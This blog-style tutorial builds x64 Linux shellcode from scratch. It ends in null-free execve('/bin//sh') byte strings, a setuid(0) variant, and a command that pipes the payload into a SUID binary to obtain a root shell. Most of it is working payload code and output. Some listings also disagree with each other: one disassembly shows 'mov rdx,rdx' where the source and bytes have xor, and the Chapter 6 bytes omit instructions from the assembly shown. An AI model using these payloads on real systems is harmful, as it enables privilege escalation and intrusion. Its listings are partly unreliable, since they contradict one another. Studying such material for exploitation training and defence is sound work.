Crafting x64 Shellcode From Scratch: A Practical Guide

May 23, 2026 in Security by Gerboise13 minutes

I’ve been tinkering with binary exploitation for a while now, and most of the targets I encounter are x86_64. Writing shellcode by hand isn’t something I do every day, maybe a few times a year at best. But every time I need one, it takes me a good two to three hours just to get back up to speed. The calling conventions, the register layout, the syscall numbers… it all needs to come back piece by piece.

What makes it worse is that most shellcode tutorials you’ll find online are written for x86 (32-bit). The classic int 0x80 examples are everywhere, but clean x64 examples? Much harder to come by. So I decided to write the reference I wish I had: a straightforward walkthrough of building x64 shellcode from the ground up.

Chapter 1: x64 Basics

Before writing any shellcode, let’s cover the essentials of how x64 Linux talks to the kernel.

Syscalls

A syscall is how user-space programs ask the kernel to do things (open files, spawn processes, exit). On x64, you trigger a syscall with the syscall instruction (not int 0x80, which is the 32-bit interface).

The syscall number goes in rax, and arguments are passed in registers in this order:

RegisterPurpose
raxsyscall number
rdiarg 1
rsiarg 2
rdxarg 3
r10arg 4
r8arg 5
r9arg 6

Full syscall list with arguments: Linux System Call Table for x86_64.

Toolchain

We’ll use NASM (Netwide Assembler) with Intel syntax, and ld to link. The build command throughout this guide is:

$ nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode

To disassemble and inspect the generated opcodes:

$ objdump -d -M intel --disassemble=_start shellcode.o

Chapter 2: A First Shellcode, exit(0)

Let’s start with the simplest possible shellcode: calling exit(0).

;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    xor rdi, rdi        ; rdi = 0 (exit code)
    mov al, 60          ; syscall number for exit (0x3c = 60)
    syscall

Build and run it:

$ nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
$ ./shellcode
$ echo $?
0

A few things to note:

  • xor rdi, rdi zeroes out rdi, the first argument to our syscall (exit code = 0).
  • mov al, 60 loads 60, the syscall number for exit.
  • syscall triggers the kernel call.

Let’s disassemble to see what we actually produced:

$ objdump -d -M intel --disassemble=_start shellcode.o

shellcode.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
   0:    48 31 ff                 xor    rdi,rdi
   3:    b0 3c                    mov    al,0x3c
   5:    0f 05                    syscall

We can see our disassembled code with the hex bytes on the left. Everything looks good. Now that we know how to assemble, link, and inspect our shellcode, let’s build something useful.

Chapter 3: Spawning a Shell, The Classic execve

The Goal

The most common use case for shellcode: you’ve found a vulnerable SUID binary, and you need to pop a shell to inherit its privileges. The simplest way to do that is to call execve("/bin/sh", NULL, NULL), which replaces the current process with a shell.

Let’s start with what this looks like as a normal C program:

// main.c
#include <unistd.h>

int main(int argc, char ** argv){
    execve("/bin/sh",0,0);
    return 0;
}

Compile and run it:

gerboise@fedora-3:/run/host/home/gerboise/Documents/blog$ gcc main.c -o main
gerboise@fedora-3:/run/host/home/gerboise/Documents/blog$ ./main
[gerboise@fedora-3 blog]$ id
uid=1000(gerboise) gid=1000(gerboise) groups=1000(gerboise),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[gerboise@fedora-3 blog]$

Assembly version

Now let’s do the same thing in assembly. Looking at the syscall table, execve is syscall 59 with three arguments: rdi = filename, rsi = argv, rdx = envp.

;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    mov rax, 0         ; clear rax
    mov al, 59         ; execve
    mov rdi, str_file  ; const char *filename
    mov rsi, 0         ; const char *const argv[]
    mov rdx, 0         ; const char *const envp[]
    syscall
    mov al, 60         ; exit
    syscall

str_file:
    db "/bin/sh", 0

Build and run:

$ nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
$ ./shellcode
$ id
uid=1000(gerboise) gid=1000(gerboise) groups=1000(gerboise),10(wheel)
$

It works, we get a shell. Let’s disassemble the final binary:

$ objdump -d -M intel --disassemble=_start shellcode

shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:    b8 00 00 00 00           mov    eax,0x0
  400085:    b0 3b                    mov    al,0x3b
  400087:    48 bf a1 00 40 00 00     movabs rdi,0x4000a1
  40008e:    00 00 00
  400091:    be 00 00 00 00           mov    esi,0x0
  400096:    ba 00 00 00 00           mov    edx,0x0
  40009b:    0f 05                    syscall
  40009d:    b0 3c                    mov    al,0x3c
  40009f:    0f 05                    syscall

That’s a lot of 00 bytes in there.

Chapter 4: Removing Null Bytes

Why do null bytes matter? In most exploitation scenarios, shellcode gets injected through string manipulation functions like strcpy, gets, or sprintf. These functions treat 0x00 as a string terminator. If your shellcode contains a null byte, everything after it gets truncated and your payload breaks.

A bad idea: moving the string before the code

A first idea might be to move the data before the code:

BITS 64

str_file:
    db "/bin/sh", 0

global _start
_start:
    mov rax, 0
    mov al, 59
    mov rdi, str_file
    mov rsi, 0
    mov rdx, 0
    syscall
    mov al, 60
    syscall

But this won’t work: str_file sits before _start in the .text section. The entry point is _start, but the bytes of "/bin/sh" (2f 62 69 6e 2f 73 68 00) are still there as machine code. The CPU would try to execute them as instructions if execution ever reached that address, and more importantly, this doesn’t solve our null byte problem at all, since the absolute address of str_file still encodes with nulls in the movabs.

Step 1: Building the string on the stack

Instead of storing the string as data in the binary, we can build it at runtime on the stack. This way we don’t need a label or an absolute address, we just push the bytes and point rdi at rsp.

One problem: "/bin/sh" is 7 bytes. A push on x64 works with 8-byte values. We could pad with a null byte, but that’s exactly what we’re trying to avoid. The trick is to use "/bin//sh" (8 bytes exactly), and Linux doesn’t care about the extra / in a path.

But how do we get the hex value for "/bin//sh"? x86_64 is little-endian, meaning the bytes are stored in reverse order in memory. So we need to reverse the string’s ASCII values:

"/bin//sh" as ASCII:  2f 62 69 6e 2f 2f 73 68
reversed (little-endian): 68 73 2f 2f 6e 69 62 2f
as a 64-bit value:    0x68732f2f6e69622f

You can also get it with Python:

$ python3 -c 'import struct; print(hex(struct.unpack("<Q", b"/bin//sh")[0]))'
0x68732f2f6e69622f
;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    mov rax, 0
    mov al, 59                         ; execve

    mov r8, 0                          ; push a null qword on the stack
    push r8                            ; this will be the string terminator

    mov r8, 0x68732F2F6E69622F         ; "/bin//sh" as a 64-bit value
    push r8                            ; push the string on the stack

    mov rdi, rsp                       ; rdi points to "/bin//sh\0" on the stack
    mov rsi, 0                         ; argv = NULL
    mov rdx, 0                         ; envp = NULL
    syscall

    mov al, 60                         ; exit
    syscall

The stack now looks like this when we hit syscall:

        low addresses
rsp →  | 2F 62 69 6E 2F 2F 73 68 |   "/bin//sh"
       | 00 00 00 00 00 00 00 00 |   null terminator
        high addresses

rdi points to rsp, which is the start of our string, properly null-terminated.

Let’s disassemble:

$ objdump -d -M intel --disassemble=_start shellcode

0000000000400080 <_start>:
  400080:    b8 00 00 00 00           mov    eax,0x0
  400085:    b0 3b                    mov    al,0x3b
  400087:    41 b8 00 00 00 00        mov    r8d,0x0
  40008d:    41 50                    push   r8
  40008f:    49 b8 2f 62 69 6e 2f     movabs r8,0x68732f2f6e69622f
  400096:    2f 73 68
  400099:    41 50                    push   r8
  40009b:    48 89 e7                 mov    rdi,rsp
  40009e:    be 00 00 00 00           mov    esi,0x0
  4000a3:    ba 00 00 00 00           mov    edx,0x0
  4000a8:    0f 05                    syscall
  4000aa:    b0 3c                    mov    al,0x3c
  4000ac:    0f 05                    syscall

We got rid of the movabs rdi with the absolute address, but there are still plenty of null bytes. mov eax,0x0, mov r8d,0x0, mov esi,0x0, mov edx,0x0 all encode with 00 bytes.

Step 2: Replacing mov ..., 0 with xor

Every mov reg, 0 encodes the zero as an immediate value, that’s 4 bytes of 00. The simple fix: xor reg, reg. XORing a register with itself always gives zero, and the instruction encodes without any null bytes. As a bonus, it’s also shorter: xor rax, rax is 3 bytes vs mov eax, 0x0 which is 5 bytes.

;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    xor rax, rax                       ; rax = 0 (no null bytes, 3 bytes)
    mov al, 59                         ; execve

    xor r8, r8                         ; r8 = 0 (no null bytes, 3 bytes)
    push r8                            ; push null terminator on stack

    mov r8, 0x68732F2F6E69622F         ; "/bin//sh" as a 64-bit value
    push r8                            ; push the string on the stack

    mov rdi, rsp                       ; rdi points to "/bin//sh\0" on the stack
    xor rsi, rsi                       ; argv = NULL (no null bytes, 3 bytes)
    xor rdx, rdx                       ; envp = NULL (no null bytes, 3 bytes)
    syscall

    mov al, 60                         ; exit
    syscall

Let’s disassemble:

$ objdump -d -M intel --disassemble=_start shellcode.o

0000000000000000 <_start>:
   0:    48 31 c0                 xor    rax,rax
   3:    b0 3b                    mov    al,0x3b
   5:    4d 31 c0                 xor    r8,r8
   8:    41 50                    push   r8
   a:    49 b8 2f 62 69 6e 2f     movabs r8,0x68732f2f6e69622f
  11:    2f 73 68
  14:    41 50                    push   r8
  16:    48 89 e7                 mov    rdi,rsp
  19:    48 31 f6                 xor    rsi,rsi
  1c:    48 89 d2                 mov    rdx,rdx
  1f:    0f 05                    syscall
  21:    b0 3c                    mov    al,0x3c
  23:    0f 05                    syscall

No more null bytes. We can extract the raw shellcode:

\x48\x31\xc0\xb0\x3b\x4d\x31\xc0\x41\x50\x49\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x41\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xb0\x3c\x0f\x05

Chapter 5: Testing the Shellcode

Now let’s make sure our shellcode actually works when injected as raw bytes. First, extract the opcodes from the binary:

$ objdump -d -M intel --disassemble=_start shellcode | grep '^ ' | cut -f2 | tr -d ' \n' | sed 's/\(..\)/\\x\1/g'
\x48\x31\xc0\xb0\x3b\x4d\x31\xc0\x41\x50\x49\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x41\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xb0\x3c\x0f\x05

We can paste this into a small C program that allocates an executable memory region with mmap, copies the shellcode into it, and jumps to it:

// gcc -o test_shellcode test_shellcode.c
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

unsigned char shellcode[] = "\x48\x31\xc0\xb0\x3b\x4d\x31\xc0\x41\x50\x49\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x41\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xb0\x3c\x0f\x05";

int main() {
    printf("Shellcode length: %lu\n", sizeof(shellcode) - 1);

    void *mem = mmap(NULL, sizeof(shellcode), PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    memcpy(mem, shellcode, sizeof(shellcode));
    ((void(*)())mem)();

    return 0;
}
$ gcc -o test_shellcode test_shellcode.c
$ ./test_shellcode
Shellcode length: 37
$ id
uid=1000(gerboise) gid=1000(gerboise) groups=1000(gerboise)
$

37 bytes, null-free, and it pops a shell.

Chapter 6: Exploiting SUID Binaries

Our shellcode spawns a shell, but if we’re exploiting a SUID binary, we need to make sure we actually get root privileges. When a SUID binary runs, the process has an effective uid of 0, but the real uid is still ours. By default, /bin/sh drops privileges if the real and effective uids don’t match. We need to call setuid(0) and setgid(0) before execve to set the real uid/gid to 0.

Looking at the syscall table:

  • setuid is syscall 105 (0x69), takes rdi = uid
  • setgid is syscall 106 (0x6a), takes rdi = gid
;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    xor rax, rax
    mov al, 105        ; setuid(0)
    xor rdi, rdi       ; uid = 0
    syscall

    xor rax, rax
    mov al, 106        ; setgid(0)
    xor rdi, rdi       ; gid = 0
    syscall

    xor rax, rax
    mov al, 59         ; execve
    xor r8, r8
    push r8            ; null terminator
    mov r8, 0x68732F2F6E69622F
    push r8            ; "/bin//sh"
    mov rdi, rsp
    xor rsi, rsi       ; argv = NULL
    xor rdx, rdx       ; envp = NULL
    syscall

    xor rax, rax
    mov al, 60         ; exit
    syscall

To inject this into a vulnerable binary via stdin:

$ python3 -c 'import sys; sys.stdout.buffer.write(b"\x48\x31\xc0\xb0\x69\x48\x31\xff\x0f\x05\xb0\x6a\x48\x31\xff\x0f\x05\xb0\x3b\x4d\x31\xc0\x41\x50\x49\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x41\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xb0\x3c\x0f\x05")' > /tmp/payload
$ (cat /tmp/payload; cat) | ./vulnerable_suid_binary
$ id
uid=0(root) gid=0(root)

The cat at the end keeps stdin open so the spawned shell doesn’t exit immediately.

Chapter 7: Shellcode Writing Tips

Here’s a collection of common techniques for writing x64 shellcode that we haven’t fully covered in the previous chapters.

jmp/call/pop, getting a string address without absolute references

This is a classic trick. The call instruction pushes the return address (the address of the next instruction) onto the stack. If we place our string right after the call, we can pop its address into a register:

    jmp short forward       ; jump over the string
back:
    pop rdi                 ; rdi = address of "/bin//sh" (pushed by call)
    ; ... rest of shellcode ...

forward:
    call back               ; pushes address of str_file onto the stack
str_file:
    db "/bin//sh", 0

The flow is: jmp forwardcall back (pushes address of str_file) → pop rdi (rdi now points to the string). This is position-independent: it works regardless of where the shellcode lands in memory, because call uses a relative offset.

LEA relative to RIP

On x64, you can use RIP-relative addressing to reference data without absolute addresses:

    lea rdi, [rel str_file]
    ; ...
str_file:
    db "/bin//sh", 0

lea rdi, [rel str_file] encodes as a relative offset from the current instruction pointer, no null bytes from absolute addresses. Shorter and simpler than jmp/call/pop, but only available on x64.

Using sub-registers to avoid null bytes

x64 registers have smaller sub-registers that you can write to independently:

rax (64-bit) → eax (32-bit) → ax (16-bit) → al (8-bit)

When you need to load a small value, use the smallest register that fits:

mov rax, 59       ; 48 c7 c0 3b 00 00 00  (7 bytes, contains null bytes)
mov eax, 59       ; b8 3b 00 00 00         (5 bytes, still has null bytes)
mov al, 59        ; b0 3b                  (2 bytes, no null bytes!)

The catch: mov al only sets the low byte, the upper bytes of rax keep their previous value. That’s why we xor rax, rax first to clear the whole register, then mov al to set the syscall number.

Note that mov eax, imm32 implicitly zero-extends to rax on x64, so xor eax, eax (2 bytes) does the same as xor rax, rax (3 bytes), a free byte saved.

Padding strings with extra slashes

As we saw in chapter 4, "/bin/sh" is 7 bytes, awkward for 8-byte pushes. Linux ignores consecutive slashes in paths, so:

  • "/bin//sh" (8 bytes, fits in one push)
  • "//bin/sh" (also works)

Avoiding syscall clobbering

The syscall instruction overwrites rcx and r11 (it saves rip into rcx and rflags into r11). If you’re chaining multiple syscalls, don’t store anything important in those registers between calls.

That’s also why rax only keeps the return value after a syscall, so you need to set the syscall number again before each call (which is why we repeat mov al, ... before each syscall).

NOP sled

When exploiting a buffer overflow, you often don’t know the exact address where your shellcode will land in memory. A NOP sled is a long sequence of nop instructions (0x90) prepended to your shellcode. If execution jumps anywhere into the sled, it slides down to your actual code:

| 90 90 90 90 90 90 90 90 90 90 | shellcode... |
  ^--- jump lands somewhere here ---> slides to shellcode

The bigger the sled, the larger your target window. In practice, you might prepend hundreds or thousands of NOPs before your payload to increase the chances of hitting it.

Conclusion

This was a quick refresher on writing x64 shellcode from scratch. Next up: Return-Oriented Programming (ROP).

Writing this article was also a learning experience for me. I used to do everything with hexdump, but working with objdump turned out to be a game changer. Being able to assemble, link, and run the shellcode as a proper ELF binary to test it, then extract the raw opcodes in one command, that’s a considerable time saver compared to my old workflow.